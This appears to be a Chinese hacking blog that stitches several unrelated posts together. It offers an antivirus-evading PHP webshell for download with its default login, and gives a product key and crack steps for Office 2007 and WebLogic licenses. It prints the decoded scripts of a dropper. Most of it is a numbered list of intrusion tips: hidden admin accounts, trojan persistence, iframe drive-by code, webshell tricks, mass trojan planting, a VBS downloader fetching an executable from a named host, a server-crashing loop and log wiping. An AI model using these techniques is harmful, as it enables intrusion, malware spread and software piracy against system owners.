今天中午同事小张打来电话说公司供货平台网站首页打开时会弹出QQ中奖等乱七八糟的广告，而且网站的无法点击购买了商品了。我想肯定是网站被入侵了，才会被植入恶意广告代码。到工商后我打开查看供货平台网站，右下角弹出一个QQ中奖广告，外加一个弹窗广告，很明显网站被人篡改过了。登陆服务器，找到ECShop的安装目录，按时间排一下顺序，很快找到一只PHP木马，把它打包先收藏了。然后检查首页代码，有好多段Script，链接到一些JS文件。打开JS文件夹，按时间排序，最后一个是common.js，我打开检查了一下，的确链接到了一个网址，并且网址被URL编码了。所以一定有问题了，不加思索就把它删了。还有个问题就是网站里点“立即购买”没反应，状态栏显示网页有错误。我起先认为是ECShop的内核文件被修改过，所以马上打电话给网新的人让他们检查处理，结果他告诉我说这个网站他们已经不管了。没办法，打算自己检查修正。本来下午不打算弄的，因为身体不舒服想挂盐水，不过去楼下的社区卫生服务点，医生检查后说有点热度但不让挂。其实我想挂点滴是想让我的咽喉尽快好一些，这几天疼得厉害，这个星期天要参加事业单位的面试。

　　那也好，我打算下午把网站的事弄好，然后晚上去医院挂。其实已经想到了，那个错误是因为某个JS文件没有起作用导致的。实践证明我的猜想是正确的，被删的common.js是正常文件，只是被入侵者修改而已。原来以为要大动干戈一个个检查文件，现在只把那个还原就OK了。Google一下，发现ECShop的确有漏洞，2.7.1和2.7.2都有，检查版本为2.7.1，补上。再对系统做了一些安全设置，就算完成了。

　　其实以上的你可以不看，我只想把某天自己的经历写一下而已。本文真正想写的是那个PHP木马，上面已经说了收获了一只免杀的PHP木马，至少经我测试最新病毒库的NOD32和Mcafee都没有检查出来，而这个PHP木马并没有加密。 名叫SPS(Spider PHP Shell)v1.0（如下图），网上一搜还有3.0版本的，还有去后门版的， 懒得管了，是免杀的就是好马！提供我捉到的Spider PHP Shell v1.0下载，有没有后门大家自己检测吧！我实在太忙没有时间。喜欢的下载去研究研究：

　　免杀PHP木马点击下载

　　忘记说了，木马的登陆用户名和密码是：admin和admin。

一、用PGHBF-6K7PC-J9989-BGGJD-TKT3Q这个密钥进行安装。

正在安装……安装完成后，务必退出程序。

二、运行“office 2007全系列激活验证破解补丁”，单击“Patch”实施破解。

三、运行office组件，在弹出的激活对话框中：1、选择电话激活；2、国家选“美国”；3、6位激活ID随便填写。在输入每段的第6个字符时，会出现“ID错误”提示：不用管它，单击确定继续填下一段。4、单击下一步，激活成功！

四、到微软正版验证中心进行验证，提示为正版！！

激活破解过程的注意事项：

1、在Visa/Windows7系统，应当“以管理员身份运行”激活验证破解补丁，否则不会成功。

2、安装之后我发现Windows Update会提示升级，升级到之后打开Office就会有问题了，当然打开Execl的时候提示“当前用户没有安装Microsoft Office Execl。请运行安装程序安装该应用程序。”，如下图：

解决方法是重新运行破解补丁就OK了。

　　所以我后来才改用文本模式下安装，一切就OK了！

　　然后杭州那边在这台服务器上安装了我们公司的一套系统，用于模拟的。结果问题来了，出现有些地方能访问有些地方不能访问的情况。比如杭州那边可以访问到，而我们公司的所有电脑去访问都显示为该页无法显示，包括我自己这边工商的网络。大家都感到奇怪，搞不懂了。服务器放在内网，通过NAT映射出去的，大家都是外网，为什么有些地方可以访问有些却访问不到？杭州那边怪我这里的防火墙没有处理好，限制了除杭州那边以外的IP。但是我联系了上海那边的技术部经理，防火墙并没有问题，他那边也是可以正常访问的。我用Firefox在偶然的一次刷新过程中，打不开的网页显示了如下的信息：

The Server is not able to service this request: HTTP/1.0 403 Forbidden WL-Result: UNAVAIL Content-Type: text/html
The Server is not able to service this request: [Server:002621]Connection rejected, the server license allows connections from only 5 unique IP addresses.

　　明白了！是Weblogic没有破解的缘故！这个License只允许连接5个IP，难怪有些可以打开有些打不开。当Weblogic记录了最先的5个IP之后，后面的IP来连接全部拒绝。我发现大部分显示“该页无法显示”，偶尔刷新一次会显示如上图的信息。我说是Weblogic没有破解的原因导致的，杭州那边还不信。但是我坚信！我跟他说这个事就交给我吧，你去忙其它的事好了。然后我去网上搜索Weblogic 10的破解，最终把它搞定，完美破解，在此分享一下。

Windows下Weblogic 10的破解

1、将license.bea和weblog_crack.jar拷贝到bea安装目录下，例如d:\bea

2、修改d:\bea\user_projects\domains\odpsdomain(你建立的域)\bin\startWeblogic.cmd
修改
set CLASSPATH=%CLASSPATH%;%MEDREC_WEBLOGIC_CLASSP
为
set CLASSPATH=d:\bea\weblogic_crack.jar;%CLASSPATH%;%MEDREC_WEBLOGIC_CLASSP

3、重启Weblogic

就这么简单！

Linux下Weblogic 10的破解

和上面在Windows下的操作步骤是一样的，只是Linux下路径不一样罢了。

　　破解程序不是我原创的，但是我亲测成功！至此，困扰了三天的难题终于解决！不过可恶的是当我马上把消息告诉杭州那边的技术员时，他居然还不承认，跟我说：嗯，我刚刚做了什么什么操作把它解决的。唉，真是无语，自尊心太强了。。

　　最后，本站会员下载Weblogic 10破解包 — 注册为本站会员即可下载，若已注册请登陆。

　　黑鹰基地（爱国者黑客）被封的事情想必每个关注黑鹰的人都知道了吧？关于黑鹰为什么会被关闭被查封，网上已经有大片的报道了，这里不再多说。

　　那么，我为什么还要写这篇文章？因为在我刚刚学习黑客技术的时候，去得最多的黑客网站就是黑鹰基地（后来改成了黑鹰安全网、爱国者黑客，记不清了）。看过那里很多的技术文章和动画教程，学到很多技术。我觉得它们的VIP教程做得是很不错，相对于其它黑客网站如网安基地、黑客动画吧等。包括在被封前，我逛得最多的黑客网站还是www.3800hk.com | www.3800cc.com。

　　在黑鹰被封的前一段时间，我还从它们网站上看到了很多关于黑鹰发展壮大的事情，河南电视台采访啊，给许昌职业技术学院的学生上课啊，市长前来参观等。真没有想到，正在黑鹰快速崛起的时候，却一下子跌进了谷底。由于传授的黑客技术和提供的黑客工具被非法利用，大米等6名网站负责人被抓，当然网站也被封了。

　　事情的始末网上相关的报道已经很多的，我就不多说了，也不多评论了。网上有叫好的也有批责的，我保持中立。总之，我觉得举办黑客培训这种模式始终是在打擦边球，很危险。因为就算你不用黑客技术非法谋利，你能保证你传授黑客技术的弟子们不会去干坏事吗？对不对？而一旦事情败露，公安机关一定会追根溯源查找黑客工具或黑客技术的出处。黑鹰就是这样一个典型的例子。不仅仅是黑鹰基地，现在正在搞黑客培训的其他黑客网站也一样，当你名气不断增大的同时，危机四伏啊！

　　现在黑鹰基地的临时论坛地址为：www.292775.com，其它的都是冒牌的。

　　再见，黑鹰基地，爱国者黑客，3800cc-3800hk！感谢你曾让我学到过很多技术，让我受益匪浅。或许你会有东山再起的一天，但是几年之内是不可能了。。

“爱国者黑客”网站的大本营（前为网站负责人李强）。

“爱国者黑客”网站的部分工作人员。

“爱国者黑客”网站的大本营。

“爱国者黑客”为学员邮购的所谓光盘教材。

在李强家中查获的部分服务器。

“爱国者黑客”工作人员赢利排名表及联系方式。

民警在中国电信许昌分公司查获“爱国者黑客”网站负责人李强在此托管的2台涉案服务器。

“爱国者黑客”工作人员所参考的有关电脑书籍。

“爱国者黑客”工作人员的住所。

部分“爱国者黑客”工作人员被警方带走接受询问。

“爱国者黑客”网站负责人李强在有关法律文书上签字。

“爱国者黑客”网站负责人李强（前）被民警带离现场。

大米(李强)在监狱里。

CCTV对黑鹰安全网被封事件的报道：

　　要是这点小问题都能难住我的话，我还怎么混呢？打开任务管理器，发现有个ProcessSafe.exe进程，看进程名感觉就是它搞的鬼。结束它，结果提示：

　　这也是预料之中的。如果它这么容易就被结束，我还写个屁啊？好了，费话少说。怎么干掉它？强大的ntsd还记得吗？ntsd -c q -p我可是一直记得。打开我的Nohacker2009，找到ProcessSafe的PID为496，路径为E:\NBMSClient。

　　ntsd -c q -p 496！提示等待30秒！
　　

　　30秒后进程被Kill了。我马上打开qvod，结果还是自动关闭。查看进程，发现ProcessSafe.exe又回来了，看下图，PID已经换成了2580。怎么办？右击进程，点击“定位到此进程文件”找到ProcessSafe.exe文件。

　　再来一下ntsd -c q -p 2580，30秒后马上删除ProcessSafe.exe，OK，搞定！再次打开Qvod下载页，没问题了，下载，安装，看电影喽！

这个肯定有猫腻！点进去看了下，我就知道一定是病毒了。打算把它下载下来玩玩，看我的回复：

OK，很快就下载好了，是个RAR的压缩包，解压一下，出来的是一个JPG图标的文件，文件名为“性感的我.scr”。嘿，我倒要看看你有多“性感”！

这种调虫小技早就过时了！改成exe文件然后用winrar打开，病毒文件都出来了！解压到一个文件夹，好，我们开始慢慢“解剖”。

对了，首先看一下自解压的注释，如下：

Path=C:\WINDOWS\system32
SavePath
Setup=C:\WINDOWS\system32\1.vbs
Silent=1
Overwrite=1
Shortcut=D, “C:\Program Files\Internet Explorer\IEXPLORE.EXE” http://vod.wx00.com/, “”, “电影院”, “电影院”
Shortcut=D, “C:\Program Files\Internet Explorer\IEXPLORE.EXE” http://www.52520qq.cn/, “”, “我爱我爱你QQ”, “我爱我爱你QQ”
Shortcut=s, “C:\Program Files\Internet Explorer\IEXPLORE.EXE” http://www.52520qq.cn/, “”, “我爱我爱你QQ”, “我爱我爱你QQ”
Shortcut=S, “C:\Program Files\Internet Explorer\IEXPLORE.EXE” http://vod.wx00.com/, “”, “电影院”, “电影院”
Shortcut=P, “C:\Program Files\Internet Explorer\IEXPLORE.EXE” http://vod.wx00.com/, “”, “电影院”, “电影院”
Shortcut=D, “C:\Program Files\Internet Explorer\IEXPLORE.EXE” http://mp3.wx00.com/, “”, “音乐大全”, “音乐大全”
Shortcut=S, “C:\Program Files\Internet Explorer\IEXPLORE.EXE” http://mp3.wx00.com/, “”, “音乐大全”, “音乐大全”
Shortcut=P, “C:\Program Files\Internet Explorer\IEXPLORE.EXE” http://BBS.wx00.com/, “”, “互动交流”, “互动交流”

很简单的东西不用我多解释了吧？首先释放到System32，然后运行1.vbs，最后建立恶意的IE快捷方式。好，先打开1.vbs看看里面写了什么：

Set ws = CreateObject(“Wscript.Shell”)
ws.run “run.bat”,vbhide
ws.run “comman.bat”,vbhide
ws.run “2.jpg”,vbhide

运行两个批处理和一个图片。我猜这张一定是美女图片了，打开瞧瞧，是不是真的性感（啊呀，发现自己还真有点色……）：

Oh, my God！Is she sexy？？wo yun……

好了，继续。第一个运行的是run.bat，打开看看，惨不忍睹的一大堆！我不添代码了，直接截个图：

乱七八糟的什么东西啊？如果你关注我以前写的技术文章，你就不会问我是什么东西了。bat加密了！！一看就是用编码转换加的密。如果你关注我以前写的技术文章，你也不会问我怎么解密了。解出来就清楚了，解密之后的代码我贴一下：

cls
@reg add “HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command” /v “” /d “\”C:\Program Files\Internet Explorer\IEXPLORE.EXE\” http://www.fwwz.net/” /f
@reg add “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run” /v “Explorer” /d “c:\windows\system32\Explorer.vbs” /f
@reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main” /v “Default_Page_URL” /d “http://www.fwwz.net” /f
@reg add “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main” /v “Start Page” /d “http://www.fwwz.net” /f
@reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion” /v “RegisteredOrganization” /d “www.fwwz.net” /f
@reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion” /v “RegisteredOwner” /d “服务网络” /f
echo [InternetShortcut] >>”%USERPROFILE%\桌面\Internet Explorer.url”
echo URL=”hao661.com/?6″ >>”%USERPROFILE%\桌面\Internet Explorer.url”
echo IconIndex=0 >>”%USERPROFILE%\桌面\Internet Explorer.url”
echo IconFile=”C:\Program Files\Internet Explorer\IEXPLORE.EXE” >>”%USERPROFILE%\桌面\Internet Explorer.url”
start /min IEXPLORE.EXE http://www.52520qq.cn/?w
start /min IEXPLORE.EXE http://bbs.wx00.com.cn/?w
del %0

这段代码在干什么呢？

一、强制把www.fwwz.net设置为主页并添加IE快捷方式hao661.com/?6到桌面；
二、把Explorer.vbs加为启动项；
三、打开www.52520qq.cn和bbs.wx00.com.cn两个网站；
四、删除自己。

再来看一下comman.bat写了什么东西，打开一看和run.bat一样也加了密：

解密之后：

cls
@reg add “HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command” /v “” /d “\”C:\Program Files\Internet Explorer\IEXPLORE.EXE\” http://www.fwwz.net/” /f
echo [InternetShortcut] >>”%USERPROFILE%\桌面\Internet Explorer.url”
echo URL=”hao661.com/?6″ >>”%USERPROFILE%\桌面\Internet Explorer.url”
echo IconIndex=0 >>”%USERPROFILE%\桌面\Internet Explorer.url”
echo IconFile=”C:\Program Files\Internet Explorer\IEXPLORE.EXE” >>”%USERPROFILE%\桌面\Internet Explorer.url”
ECHO 处于关闭状态。

和上面一样的东西嘛！真不知道作者在搞什么。

只剩下一个Explorer.vbs了，打开一看，唉…太让我失望了。。
Set ws = CreateObject(“Wscript.Shell”)
ws.run “comman.bat”,vbhide

一点都不好玩！！！

最后我们愚弄他一下吧！

　　前两天小站上刚刚写过一篇关于“百度被黑，中国黑客进行反击”的文章，今天我们来讲讲百度是怎么被黑的？百度被黑的原理是什么？

　　我想大家应该也很奇怪，百度这么强大的网站怎么可能被黑？其实，百度网站并没有被入侵，只是www.baidu.com这个域名被重定向到了另外的地方。下面两张图详细讲解了百度被黑的原理或过程，是网上找的，有兴趣的朋友可以看一下。

百度被黑的原因是什么？

我们看到百度被黑的网页清清楚地写着“This site has been hacked by iranian cyber army”，意思就是这个网站被伊朗网络军所黑。

在伊朗的华人怀疑百度被黑是“伊朗网军”报复中国网民，那么为什么要报复中国网民呢？伊朗黑客攻击百度的原因，据说是为了抗议早先（2009年12月27日）中国网民在Twitter上对伊朗反对派的支持。

有中国专家认为，网民的举动有可能落入西方的圈套。西方媒体最近正在非议中国阻止联合国对伊朗实施新制裁。美国《华尔街日报》11日的文章将两国称为“中伊轴心”。中国前驻伊朗大使华黎明12日对中国媒体表示，百度被黑一事非常奇怪，虽然中伊关系因核问题有些变化，但不至于出现类似事件，“目前找不出伊朗 攻击中国网络的动机”。

百度被黑损失了多少？

据百度财报显示，百度第三季度总营收为人民币12.787亿元，平均每日营收达1420万元。据业内人士估测，此次被黑事件将给百度造成至少半天以上的损失，损失数字将在700万元以上。资深业内人士认为，损失700万元还只是体现在账面营收上，其他方面影响也是不可估量的，不亚于当年央视对百度的批评报道。

中国黑客进行了反击

昨天百度被黑后，中国黑客红客们进行了反击，黑掉伊朗的几个大站包括有：

http://www.diabetes.ir

http://room98.ir/

http://pankration.gov.ir/

http://www.iribu.ir/

http://www.mousavian.ir/

到昨天晚上为止，以上网站都还无法访问，以下是我亲自截的图：

看到上面的图，你是不是很激动呢？！

本日志专门收集整理平时学习过程的黑客技术与技巧。

1、Xp系统修改权限防止病毒或木马等破坏系统，cmd下，
cacls C:\windows\system32 /G hqw20:R
思是给hqw20这个用户只能读取SYSTEM32目录，但不能进行修改或写入
恢复方法：C:\>cacls C:\windows\system32 /G hqw20:F

2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件，运行对话框中输入Iexpress。

3、内网使用灰鸽子，肉鸡上vidcs.exe -p端口，本地VIDCS里，VIDCS服务IP 填肉鸡的IP，VIDCS服务端口，就是给肉鸡开的端口，BINDIP添自己的内网IP，BIND端口 添8000，映射端口添8000。

4、建立隐藏帐号，上次总结了用guest建立隐藏的管理员，这次再介绍一种，在cmd下建立一个ating$的用户，然后注册表下复制管理员的1F4里的F 值到ating$的F值，再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号

5、利用INF文件来修改注册表
[Version]
Signature=”$CHICAGO$”
[Defaultinstall]
addREG=Ating
[Ating]
HKCU,”Software\Microsoft\Windows\CurrentVersion\Policies\system”,”disableregistrytools”,”0×00010001″,”1″
以上代码保存为inf格式，注意没有换行符，在命令行里导入inf的命令如下：
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
其中HKEY_CLASSES_ROOT 简写为 HKCR，HKEY_CURRENT_USER 简写为 HKCU
HKEY_LOCAL_MACHINE 简写为 HKLM，HKEY_USERS 简写为 HKU
HKEY_CURRENT_CONFIG 简写为 HKCC
0×00000000 代表的是 字符串值，0×00010001 代表的是 DWORD值
“1″这里代表是写入或删除注册表键值中的具体数据

6、关于制作穿xp2防火墙的radmin，大家一定要会，各大黑客网站都有动画,
多了一步就是在防火墙里添加个端口，然后导出其键值
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]

7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项，再在service.exe项建立一个Debugger的键（字符串值），键值填ating.exe的全路径。

8、将ftp.exe传到服务器用来提权，可以先把它变成ating.gif格式的再用，迷惑管理员。

9、有时候在我们进入了网站后台，但是没有上传图片和备份等功能，得不到webshell,
可是不能白来一场，可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。

10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”

11、我们中了盗密码的木马后不要急于删除，一般这些木马都是把密码发到指定邮箱，我们可以用探嗅软件来找到邮箱的用户名和密码，比如安全焦点的xsniff，
用法：xsniff –pass –hide –log pass.txt

12、google搜索的艺术
搜索关键字：“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
或“字符串的语法错误”可以找到很多sql注入漏洞。

13、还可以搜一些木马的关键字，比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。

14、cmd中输入 nc –vv –l –p 1987
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃

15、制作T++木马，先写个ating.hta文件,内容为
<script language=”VBScript”>
set wshshell=createobject (“wscript.shell” )
a=wshshell.run(“你马的名称”,1)
window.close
</script>
再用mshta生成T++木马，命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。

16、搜索栏里输入
关键字%’and 1=1 and ‘%’=’
关键字%’and 1=2 and ‘%’=’
比较不同处 可以作为注入的特征字符

17、挂马代码<html>
<iframe src=”马的地址” width=”0″ height=”0″ frameborder=”0″></iframe>
</html>

18、开启regedt32的SAM的管理员权限 检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡,这方法是简单克隆,
net localgroup administrators还是可以看出Guest是管理员来。

19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
用法: 安装： instsrv.exe 服务名称 路径
卸载： instsrv.exe 服务名称 REMOVE
[url=/soft/instsrv.rar]点击本站下载[/url]

21、SQL注入时工具—Internet选项—高级里找到显示友好的错误信息勾去掉
不能注入时要第一时间想到%5c暴库。

22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测，也就是说，他会检测文件是不是有.jpg，那么我们要是把文件改成：ating.jpg.asp试试。。由于还是ASP结尾，所以木马不会变~

23、缺少xp_cmdshell时
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname=’xplog70.dll’
假如恢复不成功,可以尝试直接加用户(针对开3389的)
declare @o int
exec sp_oacreate ‘wscript.shell’,@o out
exec sp_oamethod @o,’run’,NULL,’cmd.exe /c net user ating ating /add’ 再提到管理员

24.批量种植木马.bat
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
扫描地址.txt里每个主机名一行 用\\开头

25、在程序上传shell过程中，程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request(“l”)%>,我们来把他的标签换一下： <script language=VBScript runat=server>execute request(“l”)</Script> 保存为.asp,程序照样执行。

26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马

27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
然后用#clear logg和#clear line vty *删除日志

28、电脑坏了省去重新安装系统的方法
纯dos下执行，
xp:copy C:\WINDOWS\repair\*.* 到c:\windows\system32\config
2k: copy C:\winnt\repair\*.* 到c:\winnt\system32\config

29、解决TCP/IP筛选 在注册表里有三处，分别是：
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
分别用
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
命令来导出注册表项
然后把三个文件里的EnableSecurityFilters”=dword:00000001，
改成EnableSecurityFilters”=dword:00000000 再将以上三个文件分别用
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。

30、使CHM木马无法在本地运行木马程序 将注册表”HKEY_CURRENT_U
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0″下的1004项的值由原来十进制的0改为十六进制的3

31、全手工打造开3389工具
打开记事本，编辑内容如下：
echo [Components] > c:\sql
echo TSEnable = on >> c:\sql
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
编辑好后存为BAT文件，上传至肉鸡，执行

32、挂马js代码document.write(‘<iframe height=0 width=0 src=”木马地址.htm”></iframe>’);保存到js页面里 可让所有页面挂马

33、让服务器重启
写个bat死循环:
@echo off
:loop1
cls
start cmd.exe
goto loop1
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启

34、如果你登录肉鸡的3389时发现有cmd一闪而过，那你可要小心了，管理员写了个bat在监视你，
@echo off
date /t >c:/3389.txt
time /t >>c:/3389.txt
attrib +s +h c:/3389.bat
attrib +s +h c:/3389.txt
netstat -an |find “ESTABLISHED” |find “:3389″ >>c:/3389.txt
并保存为3389.bat
打开注册表找到：Userinit这个键值 在末尾加入3389.bat所在的位置，比如我放到C盘，就写：,c:/3389.bat,注意一定要加个逗号

35、有时候提不了权限的话，试试这个命令，在命令行里输入：
start http://www.hack520.org/muma.htm然后点执行。（muma.htm是你上传好的漏洞网页）
输入：netstat -an | find “28876″ 看看是否成功绑定，如果有就telnet上去，就有了system权限，当然也可以nc连接，本地执行命令。

36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
echo 你的FTP账号 >>c:\1.bat //输入账号
echo 你的FTP密码 >>c:\1.bat //输入密码
echo bin >>c:\1.bat //登入
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
echo bye >>c:\1.bat //退出
然后执行ftp -s:c:\1.bat即可

37、修改注册表开3389两法
（1）win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
echo Windows Registry Editor Version 5.00 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
echo “Enabled”=”0″ >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon] >>3389.reg
echo “ShutdownWithoutLogon”=”0″ >>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
>>3389.reg
echo “EnableAdminTSRemote”=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
>>3389.reg
echo “TSEnabled”=dword:00000001 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
echo “Start”=dword:00000002 >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
>>3389.reg
echo “Start”=dword:00000002 >>3389.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
echo “Hotkey”=”1″ >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
echo “PortNumber”=dword:00000D3D >>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp] >>3389.reg
echo “PortNumber”=dword:00000D3D >>3389.reg
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件，接着regedit /s 3389.reg导入注册表。
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
（2）winxp和win2003终端开启
用以下ECHO代码写一个REG文件：
echo Windows Registry Editor Version 5.00>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server]>>3389.reg
echo “fDenyTSConnections”=dword:00000000>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
echo “PortNumber”=dword:00000d3d>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp]>>3389.reg
echo “PortNumber”=dword:00000d3d>>3389.reg
然后regedit /s 3389.reg del 3389.reg
XP下不论开终端还是改终端端口都不需重启

38、找到SA密码为空的肉鸡一定要第一时间改SA密码，防止别人和我们抢肉吃
用查询分析器运行 EXEC sp_password NULL, ‘你要改的密码’, ’sa’

39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的！
（1）数据库文件名应复杂并要有特殊字符
（2）不要把数据库名称写在conn.asp里，要用ODBC数据源
将conn.asp文档中的
DBPath = Server.MapPath(“数据库.mdb”)
conn.Open “driver={Microsoft Access Driver (*.mdb)};dbq=” ＆ DBPath

修改为：conn.open “ODBC数据源名称,” 然后指定数据库文件的位置
（3）不放在WEB目录里

40、登陆终端后有两个东东很危险，query.exe和tsadmin.exe要Kill掉
可以写两个bat文件
@echo off
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
@del c:\winnt\system32\query.exe
@del %SYSTEMROOT%\system32\dllcache\query.exe
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的

@echo off
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
@del c:\winnt\system32\tsadmin.exe
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex

41、映射对方盘符
telnet到他的机器上，
net share 查看有没有默认共享 如果没有，那么就接着运行
net share c$=c:
net share现在有c$
在自己的机器上运行
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘，盘符为K

42、一些很有用的老知识
type c:\boot.ini ( 查看系统版本 )
net start (查看已经启动的服务)
query user ( 查看当前终端连接 )
net user ( 查看当前用户 )
net user 用户 密码/add ( 建立账号 )
net localgroup administrators 用户 /add (提升某用户为管理员)
ipconfig -all ( 查看IP什么的 )
netstat -an ( 查看当前网络状态 )
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
克隆时Administrator对应1F4
guest对应1F5
tsinternetuser对应3E8

43、如果对方没开3389，但是装了Remote Administrator Service
用这个命令F:\ftp.exe “regedit -s F:\longyi.biz\RAdmin.reg” 连接
解释：用serv-u漏洞导入自己配制好的radmin的注册表信息
先备份对方的F:\ftp.exe “regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin”

44、用lcx做内网端口映射，先在肉鸡上监听 lcx -listen 52 8089 (端口自定）
本地上运行映射，lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口）

45、在服务器写入vbs脚本下载指定文件（比如用nbsi利用注入漏洞写入）
echo Set x= CreateObject(^”Microsoft.XMLHTTP^”):x.Open
^”GET^”,LCase(WScript.Arguments(0)),0:x.Send():Set s =
CreateObject(^”ADODB.Stream^”):s.Mode = 3:s.Type =
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
（这是完整的一句话，其中没有换行符）
然后下载:
cscript down.vbs http://www.hack520.org/hack.exe hack.exe

46、一句话木马成功依赖于两个条件：
１、服务端没有禁止adodb.Stream或FSO组件
２、权限问题：如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。

47、利用DB_OWNER权限进行手工备份一句话木马的代码：
;alter database utsz set RECOVERY FULL–
;create table cmd (a image)–
;backup log utsz to disk = ‘D:\cmd’ with init–
;insert into cmd (a) values (0×3C25657865637574652872657175657374282261222929253EDA)–
;backup log utsz to disk = ‘D:\utsz_web\utsz\hacker.asp’–
注：0×3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。

48、tlntadmn是telnet服务的设置命令，可以对telnet服务的端口、认证方式等进行设置：

用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
所有会话用 ‘all’。
-s sessionid列出会话的信息。
-k sessionid终止会话。
-m sessionid发送消息到会话。

config配置 telnet 服务器参数。

common_options 为:
-u user 指定要使用其凭据的用户
-p password 用户密码

config_options 为:
 dom = domain 设定用户的默认域
